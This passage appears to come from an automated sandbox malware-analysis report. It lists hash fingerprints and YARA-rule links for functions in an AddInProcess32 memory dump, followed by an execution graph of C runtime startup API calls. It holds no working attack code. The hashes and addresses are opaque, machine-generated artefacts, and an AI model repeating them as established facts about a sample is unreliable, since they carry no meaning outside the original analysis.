                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93a27f35fdf6cf6fc1db09f4758ee4767a2c5a5127455264331dbf30a6a3790d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF0E0222057411FC31B5B7A981045F7BEFEDD2650304497FC489CB665DD259C0A83D3
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 016008F5 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: e4b5442bb067ae2711d321c9b7897fa8d2e4b98a399be641aae008a69f38f031
                                                                                                                                                                                                                                                              • Instruction ID: 8938715a4b889b28e00703451ab84806cfa138958e77675b29bdf35ba3de7316
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4b5442bb067ae2711d321c9b7897fa8d2e4b98a399be641aae008a69f38f031
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86F01260704119CFDB19AB69C41472E72937F94788F114529D506AB3E9CF385D8287DA
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01600879 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 6b1af2fc65b0fcec543087398b8fe7cdfe97a1f9ae576899d5ace4bdbe5d5cce
                                                                                                                                                                                                                                                              • Instruction ID: 7ca6654b425d85f0dbffc429b480ba3749c7f77f72a64065719092de6046d755
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b1af2fc65b0fcec543087398b8fe7cdfe97a1f9ae576899d5ace4bdbe5d5cce
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6F04F70B81205CBCB5AEB788955B7F36A2BB88284F210458E002EB3E4DF704E0697C5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 016008FE Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: fc6556ff255aef45fb99418f07c1d2a26389911e75f5428c7f903fc61caef25e
                                                                                                                                                                                                                                                              • Instruction ID: 9292ca7befdfc2e9560750b7954fbad833974a43e64bbcf50e26a4a3ef685399
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc6556ff255aef45fb99418f07c1d2a26389911e75f5428c7f903fc61caef25e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DF03060700519CFDB19AB79881472E32936F94B88F01452DD506EB3F9CF789D8287DA
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01602A00 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 783c491203d97ddb3de5e792c7657ec8344b871bc757d7f2f3cd1d087af63cc7
                                                                                                                                                                                                                                                              • Instruction ID: 742aaad390b453588a1598d533fd20446f5afbcbd5d2a105cb32ae1ef9b2e935
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 783c491203d97ddb3de5e792c7657ec8344b871bc757d7f2f3cd1d087af63cc7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBE0D832B401286FC759666CA424BBB37EBCBC5711F094139D90ED7380DD558C0B47D1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01601C59 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: f86587c368768cc337f39803c6b27becf4e13105154aa5564feb53b4bfdd9327
                                                                                                                                                                                                                                                              • Instruction ID: d5b128babbb40ff667b319a1f10a9436e55bf54e60eaa378dbc61b6b6ac204e1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f86587c368768cc337f39803c6b27becf4e13105154aa5564feb53b4bfdd9327
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3E01AB0A05349EFCB42DFA4E9554ADBBB8EB92228B1145BED804D7226E7710E01CB51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01601C68 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: c14078369bfdcd2acb3a7a519a42a20eb5b50f26f05ce0d7e84fbf44a4077b56
                                                                                                                                                                                                                                                              • Instruction ID: 151cb57a9822fa7a0f7b7bdf7688a848941dd2042fe63d426d7fa5ed986acc01
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c14078369bfdcd2acb3a7a519a42a20eb5b50f26f05ce0d7e84fbf44a4077b56
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00D01770A0120DEF8B40EFA8EA0195DB7BDEB44614B1041AED808D7224EB326E009B81
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01600969 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b5c3df71f28011e819ee153fd14692329816b26e7707c005ff16a4c8ba6ff14b
                                                                                                                                                                                                                                                              • Instruction ID: 19a3e4e9808625bf2578a90c41195f538ae2651ab8244f9f05fe49d160c14248
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5c3df71f28011e819ee153fd14692329816b26e7707c005ff16a4c8ba6ff14b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48A02200028008C08B080232C82002A2002AA80388302003202030A0F28C880302808F
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:5.4%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:13.6%
                                                                                                                                                                                                                                                              Total number of Nodes:1510
                                                                                                                                                                                                                                                              Total number of Limit Nodes:53
                                                                                                                                                                                                                                                              execution_graph 6470 4031e9 6525 405d94 6470->6525 6472 4031f5 GetStartupInfoA GetProcessHeap HeapAlloc 6473 403234 GetVersionExA 6472->6473 6474 403227 6472->6474 6476 403252 GetProcessHeap HeapFree 6473->6476 6477 403244 GetProcessHeap HeapFree 6473->6477 6608 403184 6474->6608 6478 40327e 6476->6478 6479 40322e __ioinit 6477->6479 6526 405094 HeapCreate 6478->6526 6481 4032bf 6482 4032cb 6481->6482 6484 403184 _fast_error_exit 67 API calls 6481->6484 6616 4068f5 GetModuleHandleA 6482->6616 6484->6482 6485 4032d1 6486 4032d5 6485->6486 6487 4032dd __RTC_Initialize 6485->6487 6488 403184 _fast_error_exit 67 API calls 6486->6488 6536 407fc3 6487->6536 6489 4032dc 6488->6489 6489->6487 6491 4032ea 6492 4032f6 GetCommandLineA 6491->6492 6493 4032ee 6491->6493 6551 407e8e 6492->6551 6649 405f86 6493->6649 6499 403310 6500 403314 6499->6500 6501 40331c 6499->6501 6502 405f86 __amsg_exit 67 API calls 6500->6502 6576 407b62 6501->6576 6504 40331b 6502->6504 6504->6501 6506 403325 6508 405f86 __amsg_exit 67 API calls 6506->6508 6507 40332d 6590 4060a2 6507->6590 6510 40332c 6508->6510 6510->6507 6511 403333 6512 403338 6511->6512 6513 40333f 6511->6513 6515 405f86 __amsg_exit 67 API calls 6512->6515 6596 407b05 6513->6596 6516 40333e 6515->6516 6516->6513 6517 403344 6518 403349 6517->6518 6602 401250 6517->6602 6518->6517 6521 40336f 6667 406224 6521->6667 6525->6472 6527 4050b4 6526->6527 6528 4050b7 6526->6528 6527->6481 6670 405039 6528->6670 6531 4050c6 6679 405295 HeapAlloc 6531->6679 6532 4050ea 6532->6481 6535 4050d5 HeapDestroy 6535->6527 6944 405d94 6536->6944 6538 407fcf GetStartupInfoA 6539 4093a0 __calloc_crt 67 API calls 6538->6539 6541 407ff0 6539->6541 6540 4081fa __ioinit 6540->6491 6541->6540 6542 408141 6541->6542 6545 4093a0 __calloc_crt 67 API calls 6541->6545 6547 4080c4 6541->6547 6542->6540 6543 408177 GetStdHandle 6542->6543 6544 4081dc SetHandleCount 6542->6544 6546 408189 GetFileType 6542->6546 6549 40aa5f ___crtInitCritSecAndSpinCount 67 API calls 6542->6549 6543->6542 6544->6540 6545->6541 6546->6542 6547->6540 6547->6542 6548 4080ed GetFileType 6547->6548 6550 40aa5f ___crtInitCritSecAndSpinCount 67 API calls 6547->6550 6548->6547 6549->6542 6550->6547 6552 407ec9 6551->6552 6553 407eaa GetEnvironmentStringsW 6551->6553 6554 407eb2 6552->6554 6558 407f64 6552->6558 6553->6554 6555 407ebe GetLastError 6553->6555 6556 407ef3 WideCharToMultiByte 6554->6556 6557 407ee4 GetEnvironmentStringsW 6554->6557 6555->6552 6563 407f27 6556->6563 6564 407f59 FreeEnvironmentStringsW 6556->6564 6557->6556 6560 403306 6557->6560 6559 407f6c GetEnvironmentStrings 6558->6559 6558->6560 6559->6560 6561 407f7c 6559->6561 6656 407dd5 6560->6656 6565 409360 __malloc_crt 67 API calls 6561->6565 6566 409360 __malloc_crt 67 API calls 6563->6566 6564->6560 6567 407f95 6565->6567 6568 407f2d 6566->6568 6569 407fa8 ___crtGetEnvironmentStringsA 6567->6569 6570 407f9c FreeEnvironmentStringsA 6567->6570 6568->6564 6571 407f36 WideCharToMultiByte 6568->6571 6574 407fb0 FreeEnvironmentStringsA 6569->6574 6570->6560 6572 407f50 6571->6572 6573 407f47 6571->6573 6572->6564 6575 402b57 __freebuf 67 API calls 6573->6575 6574->6560 6575->6572 6577 407b6f 6576->6577 6579 407b74 _strlen 6576->6579 6945 40a4a4 6577->6945 6580 4093a0 __calloc_crt 67 API calls 6579->6580 6583 403321 6579->6583 6584 407ba7 _strlen 6580->6584 6581 407c02 6582 402b57 __freebuf 67 API calls 6581->6582 6582->6583 6583->6506 6583->6507 6584->6581 6584->6583 6585 4093a0 __calloc_crt 67 API calls 6584->6585 6586 407c27 6584->6586 6589 402e47 __invoke_watson 10 API calls 6584->6589 6949 40302c 6584->6949 6585->6584 6587 402b57 __freebuf 67 API calls 6586->6587 6587->6583 6589->6584 6592 4060ab __except_handler4 6590->6592 7388 40a7c8 6592->7388 6593 4060ca __initterm_e 6595 4060eb __except_handler4 6593->6595 7392 4043e0 6593->7392 6595->6511 6597 407b11 6596->6597 6600 407b16 6596->6600 6598 40a4a4 ___initmbctable 110 API calls 6597->6598 6598->6600 6599 407b52 6599->6517 6600->6599 7497 40b995 6600->7497 7503 401160 6602->7503 6605 406202 8174 406134 6605->8174 6607 40620f 6607->6521 6609 403192 6608->6609 6610 40318d 6608->6610 6611 40628e __NMSG_WRITE 67 API calls 6609->6611 6612 40642e __FF_MSGBANNER 67 API calls 6610->6612 6613 40319b 6611->6613 6612->6609 6614 405fd0 _fast_error_exit 3 API calls 6613->6614 6615 4031a5 6614->6615 6615->6479 6617 406910 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6616->6617 6618 406907 6616->6618 6620 40695a TlsAlloc 6617->6620 8196 406648 6618->8196 6623 406a74 6620->6623 6624 4069a8 TlsSetValue 6620->6624 6623->6485 6624->6623 6625 4069b9 6624->6625 8202 406242 6625->8202 6628 406546 __encode_pointer 4 API calls 6629 4069c9 6628->6629 6630 406546 __encode_pointer 4 API calls 6629->6630 6631 4069d9 6630->6631 6632 406546 __encode_pointer 4 API calls 6631->6632 6633 4069e9 6632->6633 6634 406546 __encode_pointer 4 API calls 6633->6634 6635 4069f9 6634->6635 8209 4050ee 6635->8209 6638 406a6f 6640 406648 __mtterm 5 API calls 6638->6640 6639 4065b2 __decode_pointer 4 API calls 6641 406a1a 6639->6641 6640->6623 6641->6638 6642 4093a0 __calloc_crt 67 API calls 6641->6642 6643 406a33 6642->6643 6643->6638 6644 4065b2 __decode_pointer 4 API calls 6643->6644 6645 406a4d 6644->6645 6645->6638 6646 406a54 6645->6646 6647 406685 __initptd 67 API calls 6646->6647 6648 406a5c GetCurrentThreadId 6647->6648 6648->6623 6650 40642e __FF_MSGBANNER 67 API calls 6649->6650 6651 405f8b 6650->6651 6652 40628e __NMSG_WRITE 67 API calls 6651->6652 6653 405f94 6652->6653 6654 4065b2 __decode_pointer 4 API calls 6653->6654 6655 4032f5 6654->6655 6655->6492 6657 407de8 6656->6657 6658 407ded GetModuleFileNameA 6656->6658 6659 40a4a4 ___initmbctable 110 API calls 6657->6659 6660 407e14 6658->6660 6659->6658 8219 407c3d 6660->8219 6663 407e70 6663->6499 6664 409360 __malloc_crt 67 API calls 6665 407e56 6664->6665 6665->6663 6666 407c3d _parse_cmdline 77 API calls 6665->6666 6666->6663 6668 406134 _doexit 67 API calls 6667->6668 6669 403374 6668->6669 6669->6479 6681 40602f 6670->6681 6673 40505f 6695 406066 6673->6695 6676 40506b 6677 402e47 __invoke_watson 10 API calls 6676->6677 6678 40507a 6676->6678 6677->6678 6678->6531 6678->6532 6680 4050d0 6679->6680 6680->6532 6680->6535 6682 40603a 6681->6682 6684 405050 6682->6684 6702 403d90 6682->6702 6684->6673 6688 402e47 6684->6688 6933 403de0 6688->6933 6690 402ed8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6691 402f1b GetCurrentProcess TerminateProcess 6690->6691 6694 402f0f __invoke_watson 6690->6694 6935 4027ab 6691->6935 6693 402f3b 6693->6673 6694->6691 6696 406071 6695->6696 6697 403d90 __write_nolock 67 API calls 6696->6697 6698 406096 6696->6698 6699 406076 6697->6699 6698->6676 6700 402f43 __write_nolock 4 API calls 6699->6700 6701 406086 6700->6701 6701->6676 6708 406739 GetLastError 6702->6708 6704 403d95 6705 402f43 6704->6705 6706 4065b2 __decode_pointer 4 API calls 6705->6706 6707 402f51 __invoke_watson 6706->6707 6723 40661e TlsGetValue 6708->6723 6711 40675c 6712 4067b0 SetLastError 6711->6712 6728 4093a0 6711->6728 6712->6704 6716 406788 6717 4067a7 6716->6717 6718 40678f 6716->6718 6751 402b57 6717->6751 6740 406685 6718->6740 6721 406797 GetCurrentThreadId 6721->6712 6722 4067ad 6722->6712 6724 406647 TlsGetValue 6723->6724 6725 40662e 6723->6725 6724->6711 6726 4065b2 __decode_pointer 4 API calls 6725->6726 6727 406639 TlsSetValue 6726->6727 6727->6724 6731 4093a4 6728->6731 6730 40676e 6730->6712 6733 4065b2 TlsGetValue 6730->6733 6731->6730 6732 4093c4 Sleep 6731->6732 6764 40bcad 6731->6764 6732->6731 6734 4065c5 6733->6734 6735 4065e6 GetModuleHandleA 6733->6735 6734->6735 6737 4065cf TlsGetValue 6734->6737 6736 4065f5 GetProcAddress 6735->6736 6739 4065de 6735->6739 6736->6739 6738 4065da 6737->6738 6738->6735 6738->6739 6739->6716 6901 405d94 6740->6901 6742 406691 GetModuleHandleA 6743 4066b3 GetProcAddress GetProcAddress 6742->6743 6744 4066d7 InterlockedIncrement 6742->6744 6743->6744 6745 405264 __lock 63 API calls 6744->6745 6746 4066fe 6745->6746 6902 40a602 InterlockedIncrement 6746->6902 6748 40671d 6914 406730 6748->6914 6750 40672a __ioinit 6750->6721 6753 402b63 __ioinit 6751->6753 6752 402bdc __dosmaperr __ioinit 6752->6722 6753->6752 6755 405264 __lock 65 API calls 6753->6755 6763 402ba2 6753->6763 6754 402bb7 HeapFree 6754->6752 6756 402bc9 6754->6756 6760 402b7a ___sbh_find_block 6755->6760 6757 403d90 __write_nolock 65 API calls 6756->6757 6758 402bce GetLastError 6757->6758 6758->6752 6759 402b94 6925 402bad 6759->6925 6760->6759 6918 405308 6760->6918 6763->6752 6763->6754 6765 40bcb9 __ioinit 6764->6765 6766 40bcd1 6765->6766 6776 40bcf0 _memset 6765->6776 6767 403d90 __write_nolock 66 API calls 6766->6767 6768 40bcd6 6767->6768 6769 402f43 __write_nolock 4 API calls 6768->6769 6773 40bce6 __ioinit 6769->6773 6770 40bd62 HeapAlloc 6770->6776 6773->6731 6776->6770 6776->6773 6777 405264 6776->6777 6784 405ab1 6776->6784 6790 40bda9 6776->6790 6793 4043fc 6776->6793 6778 405277 6777->6778 6779 40528a EnterCriticalSection 6777->6779 6796 4051a1 6778->6796 6779->6776 6781 40527d 6781->6779 6782 405f86 __amsg_exit 66 API calls 6781->6782 6783 405289 6782->6783 6783->6779 6787 405add 6784->6787 6785 405b76 6789 405b7f 6785->6789 6896 4056cc 6785->6896 6787->6785 6787->6789 6889 40561c 6787->6889 6789->6776 6900 40518c LeaveCriticalSection 6790->6900 6792 40bdb0 6792->6776 6794 4065b2 __decode_pointer 4 API calls 6793->6794 6795 404407 6794->6795 6795->6776 6797 4051ad __ioinit 6796->6797 6809 4051d3 6797->6809 6822 40642e 6797->6822 6804 405204 6808 405264 __lock 67 API calls 6804->6808 6805 4051f5 6807 403d90 __write_nolock 67 API calls 6805->6807 6810 4051e3 __ioinit 6807->6810 6811 40520b 6808->6811 6809->6810 6868 409360 6809->6868 6810->6781 6812 405213 6811->6812 6813 40523f 6811->6813 6873 40aa5f 6812->6873 6814 402b57 __freebuf 67 API calls 6813->6814 6817 405230 6814->6817 6816 40521e 6816->6817 6818 402b57 __freebuf 67 API calls 6816->6818 6886 40525b 6817->6886 6820 40522a 6818->6820 6821 403d90 __write_nolock 67 API calls 6820->6821 6821->6817 6823 40b1cd __NMSG_WRITE 67 API calls 6822->6823 6825 406435 6823->6825 6824 406442 6827 40628e __NMSG_WRITE 67 API calls 6824->6827 6829 4051c2 6824->6829 6825->6824 6826 40b1cd __NMSG_WRITE 67 API calls 6825->6826 6826->6824 6828 40645a 6827->6828 6830 40628e __NMSG_WRITE 67 API calls 6828->6830 6831 40628e 6829->6831 6830->6829 6832 40629a 6831->6832 6833 4051c9 6832->6833 6834 40b1cd __NMSG_WRITE 64 API calls 6832->6834 6865 405fd0 6833->6865 6835 4062ba 6834->6835 6836 4063f5 GetStdHandle 6835->6836 6838 40b1cd __NMSG_WRITE 64 API calls 6835->6838 6836->6833 6837 406403 _strlen 6836->6837 6837->6833 6841 40641d WriteFile 6837->6841 6839 4062cb 6838->6839 6839->6836 6840 4062dd 6839->6840 6840->6833 6842 40302c _strcpy_s 64 API calls 6840->6842 6841->6833 6843 4062ff 6842->6843 6844 406313 GetModuleFileNameA 6843->6844 6845 402e47 __invoke_watson 10 API calls 6843->6845 6846 406331 6844->6846 6850 406354 _strlen 6844->6850 6848 406310 6845->6848 6847 40302c _strcpy_s 64 API calls 6846->6847 6849 406341 6847->6849 6848->6844 6849->6850 6852 402e47 __invoke_watson 10 API calls 6849->6852 6851 406397 6850->6851 6855 40b11a __NMSG_WRITE 64 API calls 6850->6855 6853 4029a3 _strcat_s 64 API calls 6851->6853 6852->6850 6854 4063aa 6853->6854 6856 4063bb 6854->6856 6858 402e47 __invoke_watson 10 API calls 6854->6858 6857 406384 6855->6857 6859 4029a3 _strcat_s 64 API calls 6856->6859 6857->6851 6861 402e47 __invoke_watson 10 API calls 6857->6861 6858->6856 6860 4063cc 6859->6860 6862 4063dd 6860->6862 6863 402e47 __invoke_watson 10 API calls 6860->6863 6861->6851 6864 40af7c ___crtMessageBoxA 64 API calls 6862->6864 6863->6862 6864->6833 6866 405faa ___crtCorExitProcess GetModuleHandleA GetProcAddress 6865->6866 6867 405fd9 ExitProcess 6866->6867 6870 409364 6868->6870 6869 402c34 _malloc 66 API calls 6869->6870 6870->6869 6871 4051ee 6870->6871 6872 40937c Sleep 6870->6872 6871->6804 6871->6805 6872->6870 6874 40aa6b __ioinit 6873->6874 6875 4065b2 __decode_pointer TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 6874->6875 6876 40aa7b 6875->6876 6877 40602f ___crtMessageBoxA 65 API calls 6876->6877 6882 40aacf __ioinit 6876->6882 6878 40aa8b 6877->6878 6879 402e47 __invoke_watson 10 API calls 6878->6879 6883 40aa9a 6878->6883 6879->6883 6880 40aaa3 GetModuleHandleA 6881 40aac4 6880->6881 6884 40aab2 GetProcAddress 6880->6884 6885 406546 __encode_pointer TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 6881->6885 6882->6816 6883->6880 6883->6881 6884->6881 6885->6882 6887 40518c _doexit LeaveCriticalSection 6886->6887 6888 405262 6887->6888 6888->6810 6890 405663 HeapAlloc 6889->6890 6891 40562f HeapReAlloc 6889->6891 6893 40564d 6890->6893 6894 405686 VirtualAlloc 6890->6894 6892 405651 6891->6892 6891->6893 6892->6890 6893->6785 6894->6893 6895 4056a0 HeapFree 6894->6895 6895->6893 6897 4056e1 VirtualAlloc 6896->6897 6899 405728 6897->6899 6899->6789 6900->6792 6901->6742 6903 40a620 6902->6903 6904 40a61d InterlockedIncrement 6902->6904 6905 40a62a InterlockedIncrement 6903->6905 6906 40a62d 6903->6906 6904->6903 6905->6906 6907 40a637 InterlockedIncrement 6906->6907 6908 40a63a 6906->6908 6907->6908 6909 40a644 InterlockedIncrement 6908->6909 6910 40a647 6908->6910 6909->6910 6911 40a65c InterlockedIncrement 6910->6911 6912 40a675 InterlockedIncrement 6910->6912 6913 40a66c InterlockedIncrement 6910->6913 6911->6910 6912->6748 6913->6910 6917 40518c LeaveCriticalSection 6914->6917 6916 406737 6916->6750 6917->6916 6919 405345 6918->6919 6921 4055e7 6918->6921 6920 405531 VirtualFree 6919->6920 6919->6921 6922 405595 6920->6922 6921->6759 6922->6921 6923 4055a4 VirtualFree HeapFree 6922->6923 6928 4039f0 6923->6928 6932 40518c LeaveCriticalSection 6925->6932 6927 402bb4 6927->6763 6929 403a08 6928->6929 6930 403a2f __VEC_memcpy 6929->6930 6931 403a37 6929->6931 6930->6931 6931->6921 6932->6927 6934 403dec __VEC_memzero 6933->6934 6934->6690 6936 4027b3 6935->6936 6937 4027b5 IsDebuggerPresent 6935->6937 6936->6693 6943 40653e 6937->6943 6940 4039b0 SetUnhandledExceptionFilter UnhandledExceptionFilter 6941 4039d5 GetCurrentProcess TerminateProcess 6940->6941 6942 4039cd __invoke_watson 6940->6942 6941->6693 6942->6941 6943->6940 6944->6538 6946 40a4ad 6945->6946 6947 40a4b4 6945->6947 6958 40a30a 6946->6958 6947->6579 6950 403041 6949->6950 6951 403039 6949->6951 6952 403d90 __write_nolock 67 API calls 6950->6952 6951->6950 6956 403068 6951->6956 6953 403046 6952->6953 6954 402f43 __write_nolock 4 API calls 6953->6954 6955 403055 6954->6955 6955->6584 6956->6955 6957 403d90 __write_nolock 67 API calls 6956->6957 6957->6953 6959 40a316 __ioinit 6958->6959 6989 4067bc 6959->6989 6963 40a329 7010 40a0e5 6963->7010 6966 409360 __malloc_crt 67 API calls 6967 40a34a 6966->6967 6968 40a469 __ioinit 6967->6968 7017 40a15f 6967->7017 6968->6947 6971 40a476 6971->6968 6975 40a489 6971->6975 6977 402b57 __freebuf 67 API calls 6971->6977 6972 40a37a InterlockedDecrement 6973 40a38a 6972->6973 6974 40a39b InterlockedIncrement 6972->6974 6973->6974 6979 402b57 __freebuf 67 API calls 6973->6979 6974->6968 6976 40a3b1 6974->6976 6978 403d90 __write_nolock 67 API calls 6975->6978 6976->6968 6981 405264 __lock 67 API calls 6976->6981 6977->6975 6978->6968 6980 40a39a 6979->6980 6980->6974 6983 40a3c5 InterlockedDecrement 6981->6983 6984 40a441 6983->6984 6985 40a454 InterlockedIncrement 6983->6985 6984->6985 6987 402b57 __freebuf 67 API calls 6984->6987 7026 40a46b 6985->7026 6988 40a453 6987->6988 6988->6985 6990 406739 __getptd_noexit 67 API calls 6989->6990 6991 4067c2 6990->6991 6992 4067cf 6991->6992 6993 405f86 __amsg_exit 67 API calls 6991->6993 6994 40a041 6992->6994 6993->6992 6995 40a04d __ioinit 6994->6995 6996 4067bc __write_nolock 67 API calls 6995->6996 6997 40a052 6996->6997 6998 405264 __lock 67 API calls 6997->6998 6999 40a064 6997->6999 7000 40a082 6998->7000 7002 40a072 __ioinit 6999->7002 7004 405f86 __amsg_exit 67 API calls 6999->7004 7001 40a0cb 7000->7001 7005 40a0b3 InterlockedIncrement 7000->7005 7006 40a099 InterlockedDecrement 7000->7006 7029 40a0dc 7001->7029 7002->6963 7004->7002 7005->7001 7006->7005 7007 40a0a4 7006->7007 7007->7005 7008 402b57 __freebuf 67 API calls 7007->7008 7009 40a0b2 7008->7009 7009->7005 7033 40457e 7010->7033 7013 40a120 7015 40a125 GetACP 7013->7015 7016 40a112 7013->7016 7014 40a102 GetOEMCP 7014->7016 7015->7016 7016->6966 7016->6968 7018 40a0e5 getSystemCP 79 API calls 7017->7018 7019 40a17d 7018->7019 7020 40a1c3 _memset __setmbcp_nolock 7019->7020 7021 40a188 setSBCS 7019->7021 7022 40a1b0 GetCPInfo 7019->7022 7224 409eb7 GetCPInfo 7020->7224 7023 4027ab __putwch_nolock 5 API calls 7021->7023 7022->7020 7022->7021 7024 40a308 7023->7024 7024->6971 7024->6972 7387 40518c LeaveCriticalSection 7026->7387 7028 40a472 7028->6968 7032 40518c LeaveCriticalSection 7029->7032 7031 40a0e3 7031->6999 7032->7031 7034 40458d 7033->7034 7040 4045da 7033->7040 7035 4067bc __write_nolock 67 API calls 7034->7035 7036 404592 7035->7036 7037 4045ba 7036->7037 7041 40a752 7036->7041 7039 40a041 _LocaleUpdate::_LocaleUpdate 69 API calls 7037->7039 7037->7040 7039->7040 7040->7013 7040->7014 7042 40a75e __ioinit 7041->7042 7043 4067bc __write_nolock 67 API calls 7042->7043 7044 40a763 7043->7044 7045 40a791 7044->7045 7047 40a775 7044->7047 7046 405264 __lock 67 API calls 